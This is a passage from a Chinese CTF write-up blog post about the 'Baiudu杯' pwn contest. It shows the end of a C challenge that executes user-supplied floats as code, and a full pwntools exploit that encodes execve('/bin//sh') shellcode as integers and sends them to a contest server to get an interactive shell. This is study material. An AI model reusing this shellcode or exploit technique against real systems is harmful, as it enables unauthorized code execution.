i;</span><br><span class="line">  <span class="keyword">int</span> temp;</span><br><span class="line">  <span class="keyword">float</span> ftemp;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">8192</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">scanf</span>(<span class="string">"%d"</span>, &amp;temp)) <span class="keyword">break</span>;</span><br><span class="line">    <span class="built_in">array</span>[i] = ((<span class="keyword">float</span>)temp)/<span class="number">1337.0</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">write</span>(<span class="number">1</span>, <span class="string">"here we go\n"</span>, <span class="number">11</span>);</span><br><span class="line">  (*(<span class="keyword">void</span>(*)())<span class="built_in">array</span>)();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


<p>附上exploit</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">shellcode = [<span class="string">"\x31\xc9"</span>, <span class="comment"># xor ecx, ecx</span></span><br><span class="line">             <span class="string">"\xf7\xe1"</span>, <span class="comment"># mul ecx</span></span><br><span class="line">             <span class="string">"\x51"</span>, <span class="comment"># push ecx</span></span><br><span class="line">             <span class="string">"\xb1\xff"</span>, <span class="comment"># mov cl, 0xFF</span></span><br><span class="line">             <span class="string">"\xb5\xff"</span>, <span class="comment"># mov ch, 0xFF</span></span><br><span class="line">             <span class="string">"\x41"</span>, <span class="comment"># inc ecx</span></span><br><span class="line">             <span class="string">"\xb4\x68"</span>, <span class="comment"># mov ah, 0x68</span></span><br><span class="line">             <span class="string">"\xb0\x73"</span>, <span class="comment"># mov al, 0x73</span></span><br><span class="line">             <span class="string">"\xf7\xe1"</span>, <span class="comment"># mul ecx</span></span><br><span class="line">             <span class="string">"\xb4\x2f"</span>, <span class="comment"># mov ah, 0x2F</span></span><br><span class="line">             <span class="string">"\xb0\x2f"</span>, <span class="comment"># mov al, 0x2F</span></span><br><span class="line">             <span class="string">"\x50"</span>, <span class="comment"># push eax</span></span><br><span class="line">             <span class="string">"\xb4\x6e"</span>, <span class="comment"># mov ah, 0x6e</span></span><br><span class="line">             <span class="string">"\xb0\x69"</span>, <span class="comment"># mov al, 0x69</span></span><br><span class="line">             <span class="string">"\xf7\xe1"</span>, <span class="comment"># mul ecx</span></span><br><span class="line">             <span class="string">"\xb4\x62"</span>, <span class="comment"># mov ah, 0x62</span></span><br><span class="line">             <span class="string">"\xb0\x2f"</span>, <span class="comment"># mov al, 0x2F</span></span><br><span class="line">             <span class="string">"\x50"</span>, <span class="comment"># push eax</span></span><br><span class="line">             <span class="string">"\x31\xc0"</span>, <span class="comment"># xor eax, eax</span></span><br><span class="line">             <span class="string">"\x31\xd2"</span>, <span class="comment"># xor edx, edx</span></span><br><span class="line">             <span class="string">"\x31\xc9"</span>, <span class="comment"># xor ecx, ecx</span></span><br><span class="line">             <span class="string">"\x89\xe3"</span>, <span class="comment"># mov ebx, esp</span></span><br><span class="line">             <span class="string">"\xb0\x0b"</span>, <span class="comment"># mov al, 11</span></span><br><span class="line">             <span class="string">"\xcd\x80"</span>] <span class="comment"># int 0x80</span></span><br><span class="line"></span><br><span class="line">ints_to_send = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> instr <span class="keyword">in</span> shellcode:</span><br><span class="line">    z = <span class="string">"\x40"</span></span><br><span class="line">    <span class="keyword">if</span> len(instr) == <span class="number">1</span>:</span><br><span class="line">        z = <span class="string">"\x90\x40"</span></span><br><span class="line">    payload = <span class="string">"\x48"</span> + instr[::<span class="number">-1</span>] + z</span><br><span class="line">    a = struct.unpack(<span class="string">"&gt;f"</span>, payload)[<span class="number">0</span>]*<span class="number">2333</span></span><br><span class="line">    <span class="keyword">if</span> a &gt; <span class="number">2147483647</span>:</span><br><span class="line">        log.error(<span class="string">"It's too large fam."</span>)</span><br><span class="line"></span><br><span class="line">    b = str(<span class="string">"&#123;0:f&#125;"</span>.format(a)).split(<span class="string">"."</span>)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    log.info(b + <span class="string">" "</span> + payload.encode(<span class="string">"hex"</span>))</span><br><span class="line">    ints_to_send.append(b)</span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">"106.75.84.68"</span>, <span class="number">20000</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> ints_to_send:</span><br><span class="line">    r.sendline(i)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h4 id="感言"><a href="#感言" class="headerlink" title="感言"></a>感言</h4><p>这个比赛让我感觉收获最大的应该是“思考”:<code>要学会自己思考，不然做再多题目都没有用。</code></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/">Baiudu杯 pwn专场记录</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 muhe 的个人博客">muhe</a></p>
        <p><span>发布时间:</span>2016年11月07日 - 17时07分</p>
        <p><span>最后更新:</span>2016年11月07日 - 17时43分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/" title="Baiudu杯 pwn专场记录">http://o0xmuhe.me/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/</a>
            <span class="copy-path" data-clipboard-text="原文: http://o0xmuhe.me/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/　　作者: muhe" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2016/11/10/linux-%E4%B8%8B%E8%B5%B7shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E5%88%86%E6%9E%90/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          linux 下起shell失败的分析
        
      </div>
    </a>
  
  
    <a href="/2016/10/29/how-to-compile-WinAFL/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">how to compile WinAFL</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-pwnme"><span class="toc-number">2.</span> <span class="toc-text">1.pwnme</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-loading"><span class="toc-number">3.</span> <span class="toc-text">2.loading</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#感言"><span class="toc-number">4.</span> <span class="toc-text">感言</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <section id="comments">
  <div id="disqus_thread"></div>
    <script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'o0xmuhe'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" target="_blank" rel="noopener">comments powered by Disqus.</a></noscript>
</section>
    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2016/11/10/linux-%E4%B8%8B%E8%B5%B7shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E5%88%86%E6%9E%90/" title="上一篇: linux 下起shell失败的分析">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2016/10/29/how-to-compile-WinAFL/" title="下一篇: how to compile WinAFL">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/11/15/frida-gum%E4%BB%A3%E7%A0%81%E9%98%85%E8%AF%BB/">frida-gum代码阅读笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/24/Linux-Kernel-%E7%BC%96%E8%AF%91%E8%B8%A9%E5%9D%91/">Linux Kernel 编译踩坑</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/Debug-macOS-Kernel/">Debug macOS Kernel</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/26/Snell-auto-install-cript/">Snell auto install cript</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/20/macOS-IPC-Study-basic-2/">macOS IPC Study Notes</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/09/Uninitialised-Objective-C-Pointer-Vulnerability-Analysis-CVE-2018-4196/">Uninitialised Objective-C Pointer Vulnerability Analysis (CVE-2018-4196)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/02/CVE-2019-8604-analysis/">CVE-2019-8604 analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/22/Bindiff5-0-Could-not-create-file-handler-fix/">Bindiff5.0 Could not create file handler fix</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/20/macOS-IPC-Study-basic/">macOS IPC Study basic</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/">Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/10/Apple-IPC-DO-Basic/">Apple IPC : DO Basic</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/16/Adobe-Acrobat-DC-Pro-touchup-UaF/">Adobe Acrobat DC Pro touchup UaF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/09/IDA%E8%87%AA%E5%8A%A8%E5%8C%96%E5%88%86%E6%9E%90/">IDA自动化分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/19/CVE-2017-2541-XGetWindowMovementGroup-stackoverflow/">CVE-2017-2541 __XGetWindowMovementGroup stackoverflow</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/19/CVE-2017-2540-XGetConnectionPSN-info-leak/">CVE-2017-2540 _XGetConnectionPSN info leak</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/14/find-macOS-service-and-it-s-plist-file/">find macOS service and it's plist file</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/15/Adobe-Acrobat-DC-Pro-OOB-CVE-2019-7813/">Adobe Acrobat DC Pro OOB(CVE-2019-7813)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/10/macOS-on-ESXi/">macOS on ESXi</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/20/CVE-2017-2547-%E5%88%86%E6%9E%90/">CVE-2017-2547 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/17/NULL/">NULL</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/12/CVE-2019-7125-PoC/">CVE-2019-7125 PoC</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/06/CVE-2018-4990-analysis/">CVE-2018-4990 analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/06/CVE-2016-4622-analysis/">CVE-2016-4622  analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/24/CVE-2017-2536-analysis/">CVE-2017-2536 analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/12/CVE-2018-12794-%E5%88%86%E6%9E%90/">CVE-2018-12794 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/04/%E4%BD%BF%E7%94%A8Frida%E8%BE%85%E5%8A%A9%E9%80%86%E5%90%91/">使用Frida辅助逆向</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/31/Webkit%E7%BC%96%E8%AF%91%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/">Webkit编译踩坑记录</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/25/%E9%80%86%E5%90%91%E5%8D%8F%E4%BD%9C%E4%B9%8BIDA%E6%8F%92%E4%BB%B6IDArling/">逆向协作之IDA插件IDArling</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/13/%E7%94%B1CVE-2018-12831%E5%BC%95%E5%8F%91%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%9D%E8%80%83/">由CVE-2018-12831引发的一些思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/18/TFC%E6%B8%B8%E8%AE%B0/">TFC游记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/08/Hello-PANDA/">Hello PANDA</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/07/UAF-analysis-using-pykd/">UAF analysis : using pykd</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%9F%B9%E5%85%BB%E8%AE%A1%E5%88%92/">代码审计培养计划</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/08/13/%E9%A3%9E%E6%89%AC%E5%8E%86%E9%99%A9%E8%AE%B0/">飞扬历险记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/16/linux-code-inject/">linux code inject</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/16/%E6%AF%94%E8%B5%9B%E8%BF%90%E7%BB%B4%E6%9D%82%E8%AE%B0/">比赛运维杂记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/09/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB-IFuzzer-An-Evolutionary-Interpreter-Fuzzer-using-Genetic-Programming/">论文阅读<IFuzzer: An Evolutionary Interpreter Fuzzer using Genetic Programming></a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/03/%E9%81%97%E4%BC%A0%E7%AE%97%E6%B3%95%E5%88%9D%E7%AA%A5/">遗传算法初窥</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/29/Antlr4%E5%88%9D%E4%BD%93%E9%AA%8C/">Antlr4初体验</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/04/19/mips%E7%A8%8B%E5%BA%8F%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83%E6%8A%98%E8%85%BE/">mips程序调试环境折腾</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/14/%E6%8B%AF%E6%95%91macOS-High-sierra%E7%9A%84%E7%A1%AC%E7%9B%98%E7%A9%BA%E9%97%B4/">拯救macOS High sierra的硬盘空间</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/16/Symbolic-Execution%E5%AD%A6%E4%B9%A0/">Symbolic Execution学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/11/LL-LR-SLR-LALR%E5%82%BB%E5%82%BB%E5%88%86%E4%B8%8D%E6%B8%85/">LL LR SLR LALR傻傻分不清</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/20/compiler%E5%AD%A6%E4%B9%A0/">compiler学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/15/Unicorn-Engine%E5%88%9D%E4%BD%93%E9%AA%8C/">Unicorn Engine初体验</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/06/flex-bison%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/">flex_bison读书笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/30/Python%E6%8C%87%E5%AE%9A%E6%A6%82%E7%8E%87%E8%8E%B7%E5%8F%96%E9%9A%8F%E6%9C%BA%E5%85%83%E7%B4%A0/">Python指定概率获取随机元素</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/01/Hello-World%E5%8D%87%E7%BA%A7%E7%89%88/">Hello World升级版</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/13/babydriver-writeup/">babydriver writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/05/OpenGrok%E6%90%AD%E5%BB%BA/">OpenGrok搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/30/%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86%E5%AD%A6%E4%B9%A0/">编译原理学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/28/TrendMicro-CTF-2017-Reverse300/">TrendMicro CTF 2017 Reverse300</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/19/Final/">Final</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/29/pwnhub%E6%9D%AFCUIT%E7%AC%AC%E5%8D%81%E4%B8%89%E5%B1%8A%E6%A0%A1%E8%B5%9Bpwn%E5%87%BA%E9%A2%98%E5%8F%8A%E8%BF%90%E7%BB%B4%E5%BF%83%E5%BE%97/">pwnhub杯CUIT第十三届校赛pwn出题及运维心得</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/08/SSCTF-2017%E9%83%A8%E5%88%86Writeup/">SSCTF-2017部分Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/22/360%E6%98%A5%E7%A7%8BCTF-pwn/">360春秋CTF--pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/06/Linux-Kernel-Exploit-4-beginners/">Linux Kernel Exploit 4 beginners</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/15/NJCTF-2017%E9%83%A8%E5%88%86wp/">NJCTF-2017部分wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/06/SECCON-2016-jmper/">SECCON-2016 jmper</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/04/codegate2017-angrybird/">codegate2017-angrybird</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/27/LLVM-Study-Log/">LLVM Study Log</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/16/ichunqiu-CTF-2017-2/">ichunqiu-CTF-2017-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/08/Adding-your-own-syscall-in-linux-kernel/">Adding your own syscall in linux kernel</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/04/Windows-Kernel-Exploit-Study-3/">Windows-Kernel-Exploit-Study(3)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/30/Linux%20socket%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1%E5%8F%8A%E5%BA%94%E7%94%A8/">Linux socket进程间通信及应用</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/28/%E9%97%B2%E8%A8%80%E7%A2%8E%E8%AF%AD/">闲言碎语</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/22/Have-fun-with-Blind-ROP/">Have fun with Blind ROP</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/20/Windows-Kernel-Exploit-Study-2/">Windows Kernel Exploit Study(2)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/19/Windows-Kernel-Exploit-Study-1/">Windows Kernel Exploit Study(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/24/what-DynELF-does-basically/">what DynELF does basically</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/17/fuzzing-with-peach-Just-a-toy/">fuzzing with peach(Just a toy)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/25/PlaidCTF-2016-butterfly/">PlaidCTF 2016 butterfly</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/21/Have-fun-with-glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86/">Have fun with glibc内存管理</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/10/linux-%E4%B8%8B%E8%B5%B7shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E5%88%86%E6%9E%90/">linux 下起shell失败的分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/">Baiudu杯 pwn专场记录</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/29/how-to-compile-WinAFL/">how to compile WinAFL</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/25/yocto-writeup/">yocto writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/11/HITCON-2016-Quals-SecretHolder/">HITCON-2016-Quals-SecretHolder</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/27/BCTF-cloud/">BCTF--cloud</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/24/%E4%B8%80%E4%BA%9B%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE%E9%81%87%E5%88%B0%E7%9A%84%E5%9D%91-%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/">一些环境配置遇到的坑(持续更新)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/16/Malloc-Maleficarum-%E5%A4%8D%E7%9B%98/">Malloc-Maleficarum-复盘</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/26/%E5%88%9D%E8%AF%95winafl/">初试winafl</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/14/pwnable-kr-alloca/">pwnable.kr -- alloca</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/01/%E7%AE%80%E5%8D%95%E7%9A%84%E5%B0%9D%E8%AF%95angr/">简单的尝试angr</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/29/%E7%AC%AC%E4%B8%80%E4%B8%AAandroid-cm%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90/">第一个android cm调试分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/29/install-gef/">install gef</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/30/cctf-pwn350/">cctf pwn350</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/02/15/heap-vuln-unlink/">heap vuln -- unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/02/format-string-with-stack-frame/">format string with stack frame</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/11/16/RCTF-PWN200/">RCTF -- PWN200</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/11/05/dragon/">dragon</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 muhe
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >访客数量: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>